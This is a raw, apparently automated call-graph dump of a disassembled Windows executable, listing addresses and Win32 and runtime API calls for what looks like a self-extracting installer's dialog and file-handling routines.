7ff6ca9ecac6 25894->25897 25895->25764 25898 7ff6ca9c250c SetDlgItemTextW 25896->25898 25900 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25897->25900 25899 7ff6ca9ec687 FindClose 25898->25899 25901 7ff6ca9ec6a3 25899->25901 25902 7ff6ca9ec797 SendDlgItemMessageW 25899->25902 25903 7ff6ca9ecacc 25900->25903 26301 7ff6ca9ea2cc 10 
API calls _handle_error 25901->26301 25904 7ff6ca9ec7cb 25902->25904 25907 7ff6ca9daae0 48 API calls 25904->25907 25906 7ff6ca9ec6c6 25908 7ff6ca9daae0 48 API calls 25906->25908 25909 7ff6ca9ec7d8 25907->25909 25910 7ff6ca9ec6cf 25908->25910 25912 7ff6ca9c129c 33 API calls 25909->25912 25911 7ff6ca9dda98 48 API calls 25910->25911 25915 7ff6ca9ec6ec BuildCatchObjectHelperInternal 25911->25915 25914 7ff6ca9ec807 25912->25914 25913 7ff6ca9c1fa0 31 API calls 25916 7ff6ca9ec783 25913->25916 25917 7ff6ca9c1150 33 API calls 25914->25917 25915->25869 25915->25913 25918 7ff6ca9c250c SetDlgItemTextW 25916->25918 25919 7ff6ca9ec822 25917->25919 25918->25902 25920 7ff6ca9ce164 33 API calls 25919->25920 25921 7ff6ca9ec839 25920->25921 25922 7ff6ca9c1fa0 31 API calls 25921->25922 25923 7ff6ca9ec845 BuildCatchObjectHelperInternal 25922->25923 25924 7ff6ca9c1fa0 31 API calls 25923->25924 25925 7ff6ca9ec87f 25924->25925 25926 7ff6ca9c1fa0 31 API calls 25925->25926 25927 7ff6ca9ec88c 25926->25927 25927->25880 25928 7ff6ca9c1fa0 31 API calls 25927->25928 25929 7ff6ca9ec8f3 25928->25929 25930 7ff6ca9c250c SetDlgItemTextW 25929->25930 25931 7ff6ca9ec907 25930->25931 25931->25935 26302 7ff6ca9ea2cc 10 API calls _handle_error 25931->26302 25933 7ff6ca9ec932 25934 7ff6ca9daae0 48 API calls 25933->25934 25936 7ff6ca9ec93c 25934->25936 25935->25807 25935->25846 25935->25850 25935->25897 25937 7ff6ca9dda98 48 API calls 25936->25937 25939 7ff6ca9ec959 BuildCatchObjectHelperInternal 25937->25939 25938 7ff6ca9c1fa0 31 API calls 25940 7ff6ca9ec9f0 25938->25940 25939->25890 25939->25938 25941 7ff6ca9c250c SetDlgItemTextW 25940->25941 25941->25935 25943 7ff6ca9c25d0 25942->25943 25944 7ff6ca9c256a 25942->25944 25943->25609 25944->25943 26303 7ff6ca9da4ac 25944->26303 25946 7ff6ca9c258f 25946->25943 25947 7ff6ca9c25a4 GetDlgItem 25946->25947 25947->25943 25948 7ff6ca9c25b7 25947->25948 25948->25943 25949 7ff6ca9c25be SetWindowTextW 25948->25949 25949->25943 25951 7ff6ca9c2334 25950->25951 25952 
7ff6ca9c22fc 25950->25952 26356 7ff6ca9c23f8 GetWindowTextLengthW 25951->26356 25955 7ff6ca9c129c 33 API calls 25952->25955 25954 7ff6ca9c232a BuildCatchObjectHelperInternal 25956 7ff6ca9c1fa0 31 API calls 25954->25956 25960 7ff6ca9c2389 25954->25960 25955->25954 25956->25960 25957 7ff6ca9c23c8 25958 7ff6ca9f2320 _handle_error 8 API calls 25957->25958 25959 7ff6ca9c23dd 25958->25959 25959->25630 25959->25637 25959->25648 25960->25957 25961 7ff6ca9c23f0 25960->25961 25962 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25961->25962 25963 7ff6ca9c23f5 25962->25963 25965 7ff6ca9c12d0 25964->25965 25966 7ff6ca9c139b 25964->25966 25969 7ff6ca9c1338 25965->25969 25970 7ff6ca9c1396 25965->25970 25973 7ff6ca9c12de BuildCatchObjectHelperInternal 25965->25973 26381 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 25966->26381 25972 7ff6ca9f21d0 33 API calls 25969->25972 25969->25973 26380 7ff6ca9c1f80 33 API calls 3 library calls 25970->26380 25972->25973 25973->25675 26382 7ff6ca9eae1c PeekMessageW 25974->26382 25977 7ff6ca9ef0f5 25981 7ff6ca9ef101 ShowWindow SendMessageW SendMessageW 25977->25981 25978 7ff6ca9ef143 SendMessageW SendMessageW 25979 7ff6ca9ef1a4 SendMessageW 25978->25979 25980 7ff6ca9ef189 25978->25980 25982 7ff6ca9ef1c3 25979->25982 25983 7ff6ca9ef1c6 SendMessageW SendMessageW 25979->25983 25980->25979 25981->25978 25982->25983 25984 7ff6ca9ef1f3 SendMessageW 25983->25984 25985 7ff6ca9ef218 SendMessageW 25983->25985 25984->25985 25986 7ff6ca9f2320 _handle_error 8 API calls 25985->25986 25987 7ff6ca9eb4a5 25986->25987 25987->25671 25987->25702 26387 7ff6ca9d32bc 25988->26387 25991 7ff6ca9e9d90 GetCurrentProcess OpenProcessToken 25992 7ff6ca9e9ddd GetTokenInformation 25991->25992 25993 7ff6ca9e9e47 25991->25993 25994 7ff6ca9e9e08 GetLastError 25992->25994 25995 7ff6ca9e9e17 25992->25995 25996 7ff6ca9f2320 _handle_error 8 API calls 25993->25996 25994->25993 25994->25995 25998 7ff6ca9e9e20 GetTokenInformation 25995->25998 25997 7ff6ca9e9f32 
25996->25997 25997->25712 25998->25993 25999 7ff6ca9e9e54 CopySid 25998->25999 26000 7ff6ca9fa260 25999->26000 26001 7ff6ca9e9e6e SetEntriesInAclW 26000->26001 26001->25993 26002 7ff6ca9e9ebe InitializeSecurityDescriptor 26001->26002 26003 7ff6ca9e9ecf SetSecurityDescriptorDacl 26002->26003 26004 7ff6ca9e9f16 26002->26004 26003->26004 26005 7ff6ca9e9ee8 CreateDirectoryW 26003->26005 26004->25993 26006 7ff6ca9e9f20 LocalFree 26004->26006 26005->26004 26006->25993 26009 7ff6ca9d309d 26008->26009 26016 7ff6ca9d2f8e 26008->26016 26010 7ff6ca9f2320 _handle_error 8 API calls 26009->26010 26011 7ff6ca9d30b3 26010->26011 26011->25734 26011->25735 26012 7ff6ca9d3077 26012->26009 26013 7ff6ca9d3684 56 API calls 26012->26013 26013->26009 26014 7ff6ca9c129c 33 API calls 26014->26016 26016->26012 26016->26014 26017 7ff6ca9d30c8 26016->26017 26499 7ff6ca9d3684 26016->26499 26018 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26017->26018 26019 7ff6ca9d30cd 26018->26019 26021 7ff6ca9d7fd2 SetCurrentDirectoryW 26020->26021 26022 7ff6ca9d7fcf 26020->26022 26021->25748 26022->26021 26024 7ff6ca9c4255 26023->26024 26025 7ff6ca9c426a 26024->26025 26026 7ff6ca9c129c 33 API calls 26024->26026 26027 7ff6ca9f2320 _handle_error 8 API calls 26025->26027 26026->26025 26028 7ff6ca9c42a1 26027->26028 26029 7ff6ca9c3c84 26028->26029 26030 7ff6ca9c3cab 26029->26030 26533 7ff6ca9c710c 26030->26533 26032 7ff6ca9c3cbb BuildCatchObjectHelperInternal 26032->25785 26035 7ff6ca9d216a 26033->26035 26034 7ff6ca9d219e 26038 7ff6ca9d6a0c 49 API calls 26034->26038 26045 7ff6ca9d227f 26034->26045 26035->26034 26036 7ff6ca9d21b1 CreateFileW 26035->26036 26036->26034 26037 7ff6ca9d22af 26039 7ff6ca9f2320 _handle_error 8 API calls 26037->26039 26040 7ff6ca9d2209 26038->26040 26042 7ff6ca9d22c4 26039->26042 26043 7ff6ca9d220d CreateFileW 26040->26043 26044 7ff6ca9d2246 26040->26044 26041 7ff6ca9c20b0 33 API calls 26041->26037 26042->25824 26042->25825 26043->26044 26044->26045 26046 7ff6ca9d22d8 
26044->26046 26045->26037 26045->26041 26047 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26046->26047 26048 7ff6ca9d22dd 26047->26048 26050 7ff6ca9d2066 26049->26050 26051 7ff6ca9d2072 26049->26051 26050->26051 26545 7ff6ca9d20d0 26050->26545 26552 7ff6ca9eaa08 26053->26552 26055 7ff6ca9ed1ee 26056 7ff6ca9c1fa0 31 API calls 26055->26056 26057 7ff6ca9ed1f7 26056->26057 26059 7ff6ca9f2320 _handle_error 8 API calls 26057->26059 26058 7ff6ca9dd22c 33 API calls 26197 7ff6ca9ecf03 BuildCatchObjectHelperInternal 26058->26197 26060 7ff6ca9ebc2b 26059->26060 26060->25833 26061 7ff6ca9eeefa 26650 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26061->26650 26064 7ff6ca9eef00 26651 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26064->26651 26066 7ff6ca9eef06 26070 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26066->26070 26068 7ff6ca9eeeee 26069 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26068->26069 26071 7ff6ca9eeef4 26069->26071 26072 7ff6ca9eef0c 26070->26072 26649 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26071->26649 26075 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26072->26075 26077 7ff6ca9eef12 26075->26077 26076 7ff6ca9eee4a 26078 7ff6ca9eeed2 26076->26078 26079 7ff6ca9c20b0 33 API calls 26076->26079 26082 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26077->26082 26647 7ff6ca9c1f80 33 API calls 3 library calls 26078->26647 26084 7ff6ca9eee77 26079->26084 26080 7ff6ca9c13a4 33 API calls 26085 7ff6ca9edc3a GetTempPathW 26080->26085 26081 7ff6ca9eeee8 26648 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26081->26648 26087 7ff6ca9eef18 26082->26087 26646 7ff6ca9eabe8 33 API calls 3 library calls 26084->26646 26085->26197 26086 7ff6ca9d62dc 35 API calls 26086->26197 26095 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26087->26095 26090 7ff6ca9fbb8c 43 API calls 26090->26197 26092 7ff6ca9eee8d 26101 7ff6ca9c1fa0 31 API calls 26092->26101 
26105 7ff6ca9eeea4 BuildCatchObjectHelperInternal 26092->26105 26093 7ff6ca9c2520 SetWindowTextW 26093->26197 26098 7ff6ca9eef1e 26095->26098 26096 7ff6ca9c8d04 33 API calls 26096->26197 26103 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26098->26103 26099 7ff6ca9c2034 33 API calls 26099->26197 26100 7ff6ca9ee7f3 26100->26078 26100->26081 26104 7ff6ca9f21d0 33 API calls 26100->26104 26113 7ff6ca9ee83b BuildCatchObjectHelperInternal 26100->26113 26101->26105 26102 7ff6ca9c1fa0 31 API calls 26102->26078 26107 7ff6ca9eef24 26103->26107 26104->26113 26105->26102 26112 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26107->26112 26108 7ff6ca9c20b0 33 API calls 26108->26197 26109 7ff6ca9eaa08 33 API calls 26109->26197 26110 7ff6ca9eef6c 26654 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26110->26654 26111 7ff6ca9d3f30 54 API calls 26111->26197 26117 7ff6ca9eef2a 26112->26117 26123 7ff6ca9c20b0 33 API calls 26113->26123 26164 7ff6ca9eeb8f 26113->26164 26115 7ff6ca9c1fa0 31 API calls 26115->26076 26116 7ff6ca9eef78 26656 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26116->26656 26129 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26117->26129 26118 7ff6ca9eef72 26655 7ff6ca9c1f80 33 API calls 3 library calls 26118->26655 26119 7ff6ca9c20b0 33 API calls 26200 7ff6ca9ed489 26119->26200 26121 7ff6ca9d5820 33 API calls 26121->26197 26122 7ff6ca9eef66 26653 7ff6ca9c1f80 33 API calls 3 library calls 26122->26653 26130 7ff6ca9ee963 26123->26130 26125 7ff6ca9c1fa0 31 API calls 26125->26197 26128 7ff6ca9eec2a 26128->26110 26128->26122 26137 7ff6ca9eec72 BuildCatchObjectHelperInternal 26128->26137 26143 7ff6ca9eed3b BuildCatchObjectHelperInternal 26128->26143 26145 7ff6ca9f21d0 33 API calls 26128->26145 26135 7ff6ca9eef30 26129->26135 26136 7ff6ca9eef60 26130->26136 26144 7ff6ca9c129c 33 API calls 26130->26144 26133 7ff6ca9eed40 26133->26116 26133->26118 26133->26143 26148 7ff6ca9f21d0 33 API calls 26133->26148 26134 7ff6ca9d3d34 
51 API calls 26134->26197 26149 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26135->26149 26652 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26136->26652 26557 7ff6ca9ef4e0 26137->26557 26139 7ff6ca9ed5e9 GetDlgItem 26146 7ff6ca9c2520 SetWindowTextW 26139->26146 26141 7ff6ca9e99c8 31 API calls 26141->26197 26143->26115 26150 7ff6ca9ee9a6 26144->26150 26145->26137 26151 7ff6ca9ed608 SendMessageW 26146->26151 26148->26143 26154 7ff6ca9eef36 26149->26154 26642 7ff6ca9dd22c 26150->26642 26151->26200 26152 7ff6ca9ddc2c 33 API calls 26152->26197 26160 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26154->26160 26156 7ff6ca9d5b60 53 API calls 26156->26197 26157 7ff6ca9d32bc 51 API calls 26157->26197 26158 7ff6ca9c2674 31 API calls 26158->26197 26159 7ff6ca9d5aa8 33 API calls 26159->26197 26163 7ff6ca9eef3c 26160->26163 26161 7ff6ca9ed63c SendMessageW 26161->26200 26168 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26163->26168 26164->26128 26164->26133 26169 7ff6ca9eef54 26164->26169 26171 7ff6ca9eef5a 26164->26171 26170 7ff6ca9eef42 26168->26170 26172 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26169->26172 26176 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26170->26176 26175 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26171->26175 26172->26171 26173 7ff6ca9c4228 33 API calls 26173->26197 26175->26136 26178 7ff6ca9eef48 26176->26178 26177 7ff6ca9d32a8 51 API calls 26177->26197 26180 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26178->26180 26179 7ff6ca9ce164 33 API calls 26179->26197 26182 7ff6ca9eef4e 26180->26182 26181 7ff6ca9c250c SetDlgItemTextW 26181->26197 26187 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26182->26187 26183 7ff6ca9c129c 33 API calls 26194 7ff6ca9ee9d1 26183->26194 26185 7ff6ca9c1150 33 API calls 26185->26197 26187->26169 26188 7ff6ca9e13c4 CompareStringW 26188->26194 26190 7ff6ca9c1fa0 31 API calls 26190->26194 
26191 7ff6ca9c129c 33 API calls 26191->26197 26194->26164 26194->26178 26194->26182 26194->26183 26194->26188 26194->26190 26196 7ff6ca9dd22c 33 API calls 26194->26196 26196->26194 26197->26055 26197->26058 26197->26061 26197->26064 26197->26068 26197->26071 26197->26072 26197->26076 26197->26077 26197->26080 26197->26086 26197->26087 26197->26090 26197->26093 26197->26096 26197->26098 26197->26099 26197->26100 26197->26107 26197->26108 26197->26109 26197->26111 26197->26117 26197->26121 26197->26125 26197->26134 26197->26135 26197->26141 26197->26152 26197->26154 26197->26156 26197->26157 26197->26158 26197->26159 26197->26163 26197->26170 26197->26173 26197->26177 26197->26179 26197->26181 26197->26185 26197->26191 26198 7ff6ca9edb21 MoveFileW 26197->26198 26197->26200 26202 7ff6ca9d2f58 56 API calls 26197->26202 26556 7ff6ca9e13c4 CompareStringW 26197->26556 26596 7ff6ca9dcfa4 35 API calls _invalid_parameter_noinfo_noreturn 26197->26596 26597 7ff6ca9e95b4 33 API calls Concurrency::cancel_current_task 26197->26597 26598 7ff6ca9f0684 31 API calls _invalid_parameter_noinfo_noreturn 26197->26598 26600 7ff6ca9ea834 33 API calls _invalid_parameter_noinfo_noreturn 26197->26600 26601 7ff6ca9e9518 33 API calls 26197->26601 26604 7ff6ca9eabe8 33 API calls 3 library calls 26197->26604 26605 7ff6ca9d7368 33 API calls 2 library calls 26197->26605 26606 7ff6ca9d4088 33 API calls 26197->26606 26607 7ff6ca9d65b0 33 API calls 3 library calls 26197->26607 26608 7ff6ca9d72cc 26197->26608 26612 7ff6ca9c1744 33 API calls 4 library calls 26197->26612 26613 7ff6ca9d31bc 26197->26613 26627 7ff6ca9d3ea0 FindClose 26197->26627 26628 7ff6ca9e13f4 CompareStringW 26197->26628 26629 7ff6ca9e9cd0 47 API calls 26197->26629 26630 7ff6ca9e87d8 51 API calls 3 library calls 26197->26630 26631 7ff6ca9eab54 33 API calls _handle_error 26197->26631 26632 7ff6ca9d7df4 26197->26632 26640 7ff6ca9d5b08 CompareStringW 26197->26640 26641 7ff6ca9d7eb0 47 API calls 26197->26641 26199 7ff6ca9edb55 MoveFileExW 
26198->26199 26198->26200 26199->26200 26200->26066 26200->26119 26200->26161 26200->26197 26201 7ff6ca9c1fa0 31 API calls 26200->26201 26599 7ff6ca9cdf4c 47 API calls BuildCatchObjectHelperInternal 26200->26599 26602 7ff6ca9c2674 31 API calls _invalid_parameter_noinfo_noreturn 26200->26602 26603 7ff6ca9ea440 115 API calls 2 library calls 26200->26603 26201->26200 26202->26197 26205 7ff6ca9ef9a3 26204->26205 26206 7ff6ca9c20b0 33 API calls 26205->26206 26207 7ff6ca9ef9b9 26206->26207 26208 7ff6ca9ef9ee 26207->26208 26209 7ff6ca9c20b0 33 API calls 26207->26209 26672 7ff6ca9ce34c 26208->26672 26209->26208 26211 7ff6ca9efa4b 26692 7ff6ca9ce7a8 26211->26692 26215 7ff6ca9efa61 26216 7ff6ca9f2320 _handle_error 8 API calls 26215->26216 26217 7ff6ca9ebc52 26216->26217 26217->25848 27853 7ff6ca9e849c 26218->27853 26221 7ff6ca9ef4b7 26223 7ff6ca9f2320 _handle_error 8 API calls 26221->26223 26222 7ff6ca9ef3c7 GetWindow 26227 7ff6ca9ef3e2 26222->26227 26224 7ff6ca9ebe9b 26223->26224 26224->25617 26224->25618 26225 7ff6ca9ef3ee GetClassNameW 27858 7ff6ca9e13c4 CompareStringW 26225->27858 26227->26221 26227->26225 26228 7ff6ca9ef496 GetWindow 26227->26228 26229 7ff6ca9ef417 GetWindowLongPtrW 26227->26229 26228->26221 26228->26227 26229->26228 26230 7ff6ca9ef429 SendMessageW 26229->26230 26230->26228 26231 7ff6ca9ef445 GetObjectW 26230->26231 27859 7ff6ca9e8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26231->27859 26234 7ff6ca9ef461 27860 7ff6ca9e84cc 26234->27860 27864 7ff6ca9e8df4 15 API calls _handle_error 26234->27864 26236 7ff6ca9ef479 SendMessageW 27865 7ff6caa2e0f0 26236->27865 26239 7ff6ca9d6300 26238->26239 26244 7ff6ca9d638d 26238->26244 26240 7ff6ca9c13a4 33 API calls 26239->26240 26241 7ff6ca9d631b GetCurrentDirectoryW 26240->26241 26242 7ff6ca9d6341 26241->26242 26243 7ff6ca9c20b0 33 API calls 26242->26243 26245 7ff6ca9d634f 26243->26245 26244->25632 26245->26244 26246 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26245->26246 26247 7ff6ca9d63a9 
27833->27831 27834->27788 27836 7ff6ca9d4632 27835->27836 27838 7ff6ca9d463a 27835->27838 27837 7ff6ca9de948 108 API calls 27836->27837 27837->27838 27838->27826 27840 7ff6ca9d163e 27839->27840 27844 7ff6ca9d1681 27839->27844 27843 7ff6ca9d31bc 51 API calls 27840->27843 27840->27844 27841 7ff6ca9c1fa0 31 API calls 27841->27844 27842 7ff6ca9ce600 31 API calls 27847 7ff6ca9d16de 27842->27847 27843->27840 27844->27841 27849 7ff6ca9d16a0 27844->27849 27845 7ff6ca9d178d 27851 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27845->27851 27846 7ff6ca9d175b 27848 7ff6ca9f2320 _handle_error 8 API calls 27846->27848 27847->27845 27847->27846 27850 7ff6ca9ce58a 27848->27850 27849->27842 27850->26709 27850->26710 27852 7ff6ca9d1792 27851->27852 27854 7ff6ca9e84cc 4 API calls 27853->27854 27855 7ff6ca9e84aa 27854->27855 27856 7ff6ca9e84b9 27855->27856 27866 7ff6ca9e8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27855->27866 27856->26221 27856->26222 27858->26227 27859->26234 27861 7ff6ca9e84de 27860->27861 27863 7ff6ca9e84e3 27860->27863 27867 7ff6ca9e8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27861->27867 27863->26234 27864->26236 27866->27856 27867->27863 27868->26272 27869->26289 27870->26299 27872 7ff6ca9f20f0 27873 7ff6ca9f2106 _com_error::_com_error 27872->27873 27874 7ff6ca9f4078 Concurrency::cancel_current_task 2 API calls 27873->27874 27875 7ff6ca9f2117 27874->27875 27876 7ff6ca9f1900 _com_raise_error 14 API calls 27875->27876 27877 7ff6ca9f2163 27876->27877 27878 7ff6ca9f1491 27879 7ff6ca9f13c9 27878->27879 27880 7ff6ca9f1900 _com_raise_error 14 API calls 27879->27880 27881 7ff6ca9f1408 27880->27881 27882 7ff6ca9f11cf 27883 7ff6ca9f1102 27882->27883 27884 7ff6ca9f1900 _com_raise_error 14 API calls 27883->27884 27884->27883 27885 7ff6ca9f2d6c 27910 7ff6ca9f27fc 27885->27910 27888 7ff6ca9f2eb8 28004 7ff6ca9f3170 7 API calls 2 library calls 27888->28004 27889 7ff6ca9f2d88 __scrt_acquire_startup_lock 27891 7ff6ca9f2ec2 27889->27891 27894 7ff6ca9f2da6 
27889->27894 28005 7ff6ca9f3170 7 API calls 2 library calls 27891->28005 27893 7ff6ca9f2de8 __scrt_release_startup_lock 27898 7ff6ca9f2e51 27893->27898 28001 7ff6ca9fc050 35 API calls __GSHandlerCheck_EH 27893->28001 27894->27893 27895 7ff6ca9f2dcb 27894->27895 27918 7ff6ca9fcd90 27894->27918 27896 7ff6ca9f2ecd abort 27922 7ff6ca9f32bc 27898->27922 27900 7ff6ca9f2e56 27925 7ff6ca9fcd20 27900->27925 27907 7ff6ca9f2e79 27907->27896 28003 7ff6ca9f2990 7 API calls __scrt_initialize_crt 27907->28003 27909 7ff6ca9f2e90 27909->27895 28006 7ff6ca9f2fb0 27910->28006 27913 7ff6ca9f282b 28008 7ff6ca9fcc50 27913->28008 27917 7ff6ca9f2827 27917->27888 27917->27889 27919 7ff6ca9fcdcc 27918->27919 27920 7ff6ca9fcdeb 27918->27920 27919->27920 28025 7ff6ca9c1120 27919->28025 27920->27893 27923 7ff6ca9f3cf0 __scrt_get_show_window_mode 27922->27923 27924 7ff6ca9f32d3 GetStartupInfoW 27923->27924 27924->27900 28031 7ff6caa00730 27925->28031 27927 7ff6ca9fcd2f 27928 7ff6ca9f2e5e 27927->27928 28035 7ff6caa00ac0 35 API calls swprintf 27927->28035 27930 7ff6ca9f0754 27928->27930 28037 7ff6ca9ddfd0 27930->28037 27933 7ff6ca9d62dc 35 API calls 27934 7ff6ca9f079a 27933->27934 28114 7ff6ca9e946c 27934->28114 27936 7ff6ca9f07a4 __scrt_get_show_window_mode 28119 7ff6ca9e9a14 27936->28119 27938 7ff6ca9f0ddc 27940 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27938->27940 27939 7ff6ca9f096e GetCommandLineW 27942 7ff6ca9f0980 27939->27942 27943 7ff6ca9f0b42 27939->27943 27944 7ff6ca9f0de2 27940->27944 27941 7ff6ca9f0819 27941->27938 27941->27939 27948 7ff6ca9c129c 33 API calls 27942->27948 27945 7ff6ca9d6454 34 API calls 27943->27945 27947 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27944->27947 27946 7ff6ca9f0b51 27945->27946 27950 7ff6ca9c1fa0 31 API calls 27946->27950 27954 7ff6ca9f0b68 BuildCatchObjectHelperInternal 27946->27954 27949 7ff6ca9f0de8 27947->27949 27952 7ff6ca9f09a5 27948->27952 27953 7ff6ca9f1900 _com_raise_error 14 API calls 27949->27953 
27950->27954 27951 7ff6ca9c1fa0 31 API calls 27955 7ff6ca9f0b93 SetEnvironmentVariableW GetLocalTime 27951->27955 28153 7ff6ca9ecad0 102 API calls 3 library calls 27952->28153 27957 7ff6ca9f0e34 27953->27957 27954->27951 27958 7ff6ca9d3e28 swprintf 46 API calls 27955->27958 27960 7ff6ca9f0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 27958->27960 27959 7ff6ca9f09af 27959->27944 27961 7ff6ca9f0adb 27959->27961 27962 7ff6ca9f09f9 OpenFileMappingW 27959->27962 28129 7ff6ca9eb014 LoadBitmapW 27960->28129 27969 7ff6ca9c129c 33 API calls 27961->27969 27964 7ff6ca9f0ad0 CloseHandle 27962->27964 27965 7ff6ca9f0a19 MapViewOfFile 27962->27965 27964->27943 27965->27964 27967 7ff6ca9f0a3f UnmapViewOfFile MapViewOfFile 27965->27967 27966 7ff6ca9f0c5f 28145 7ff6ca9d98ac 27966->28145 27967->27964 27970 7ff6ca9f0a71 27967->27970 27973 7ff6ca9f0b00 27969->27973 28154 7ff6ca9ea190 33 API calls 2 library calls 27970->28154 27971 7ff6ca9f0c75 28150 7ff6ca9e67b4 27971->28150 28158 7ff6ca9efd0c 35 API calls 2 library calls 27973->28158 27977 7ff6ca9f0a81 28155 7ff6ca9efd0c 35 API calls 2 library calls 27977->28155 27978 7ff6ca9e67b4 33 API calls 27981 7ff6ca9f0c87 DialogBoxParamW 27978->27981 27979 7ff6ca9f0b0a 27979->27943 27984 7ff6ca9f0dd7 27979->27984 27989 7ff6ca9f0cd3 27981->27989 27982 7ff6ca9f0a90 28156 7ff6ca9db9b4 102 API calls 27982->28156 27986 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 27984->27986 27985 7ff6ca9f0aa5 28157 7ff6ca9dbb00 102 API calls 27985->28157 27986->27938 27988 7ff6ca9f0ab8 27992 7ff6ca9f0ac7 UnmapViewOfFile 27988->27992 27990 7ff6ca9f0cec 27989->27990 27991 7ff6ca9f0ce6 Sleep 27989->27991 27994 7ff6ca9f0cfa 27990->27994 28159 7ff6ca9e9f4c 49 API calls 2 library calls 27990->28159 27991->27990 27992->27964 27995 7ff6ca9f0d5b 27994->27995 27998 7ff6ca9f0d6d 27994->27998 27996 7ff6ca9efe24 5 API calls 27995->27996 27997 7ff6ca9f0d60 CloseHandle 27996->27997 27997->27998 27999 7ff6ca9f2320 _handle_error 8 API calls 27998->27999 
28000 7ff6ca9f0dba 27999->28000 28002 7ff6ca9f3300 GetModuleHandleW 28000->28002 28001->27898 28002->27907 28003->27909 28004->27891 28005->27896 28007 7ff6ca9f281e __scrt_dllmain_crt_thread_attach 28006->28007 28007->27913 28007->27917 28009 7ff6caa00d4c 28008->28009 28010 7ff6ca9f2830 28009->28010 28013 7ff6ca9fec00 28009->28013 28010->27917 28012 7ff6ca9f51a0 7 API calls 2 library calls 28010->28012 28012->27917 28024 7ff6ca9ff398 EnterCriticalSection 28013->28024 28026 7ff6ca9c91c8 35 API calls 28025->28026 28027 7ff6ca9c1130 28026->28027 28030 7ff6ca9f29bc 34 API calls 28027->28030 28029 7ff6ca9f2a01 28029->27919 28030->28029 28032 7ff6caa00749 28031->28032 28033 7ff6caa0073d 28031->28033 28032->27927 28036 7ff6caa00570 48 API calls 5 library calls 28033->28036 28035->27927 28036->28032 28160 7ff6ca9f2450 28037->28160 28039 7ff6ca9ddff4 GetModuleHandleW 28040 7ff6ca9de07b 28039->28040 28041 7ff6ca9de026 GetProcAddress 28039->28041 28044 7ff6ca9de503 28040->28044 28167 7ff6ca9fb788 39 API calls _snwprintf 28040->28167 28042 7ff6ca9de053 GetProcAddress 28041->28042 28043 7ff6ca9de03b 28041->28043 28042->28040 28046 7ff6ca9de068 28042->28046 28043->28042 28045 7ff6ca9d6454 34 API calls 28044->28045 28048 7ff6ca9de50c 28045->28048 28046->28040 28050 7ff6ca9d7df4 47 API calls 28048->28050 28049 7ff6ca9de3b0 28049->28044 28051 7ff6ca9de3ba 28049->28051 28080 7ff6ca9de51a 28050->28080 28052 7ff6ca9d6454 34 API calls 28051->28052 28053 7ff6ca9de3c3 CreateFileW 28052->28053 28054 7ff6ca9de403 SetFilePointer 28053->28054 28055 7ff6ca9de4f0 CloseHandle 28053->28055 28054->28055 28057 7ff6ca9de41c ReadFile 28054->28057 28058 7ff6ca9c1fa0 31 API calls 28055->28058 28057->28055 28059 7ff6ca9de444 28057->28059 28058->28044 28060 7ff6ca9de800 28059->28060 28061 7ff6ca9de458 28059->28061 28173 7ff6ca9f2624 8 API calls 28060->28173 28066 7ff6ca9c129c 33 API calls 28061->28066 28063 7ff6ca9c129c 33 API calls 28063->28080 28064 7ff6ca9de805 28065 7ff6ca9de53e CompareStringW 
28065->28080 28072 7ff6ca9de48f 28066->28072 28067 7ff6ca9d8090 47 API calls 28067->28080 28068 7ff6ca9c1fa0 31 API calls 28068->28080 28070 7ff6ca9de7c2 28075 7ff6ca9c1fa0 31 API calls 28070->28075 28071 7ff6ca9de648 28169 7ff6ca9d7eb0 47 API calls 28071->28169 28077 7ff6ca9de4db 28072->28077 28168 7ff6ca9dd0a0 33 API calls 28072->28168 28074 7ff6ca9de5cc 28084 7ff6ca9c129c 33 API calls 28074->28084 28090 7ff6ca9d8090 47 API calls 28074->28090 28095 7ff6ca9c1fa0 31 API calls 28074->28095 28100 7ff6ca9d32bc 51 API calls 28074->28100 28105 7ff6ca9de63a 28074->28105 28079 7ff6ca9de7cb 28075->28079 28076 7ff6ca9d32bc 51 API calls 28076->28080 28081 7ff6ca9c1fa0 31 API calls 28077->28081 28078 7ff6ca9de651 28083 7ff6ca9d51a4 9 API calls 28078->28083 28085 7ff6ca9c1fa0 31 API calls 28079->28085 28080->28063 28080->28065 28080->28067 28080->28068 28080->28074 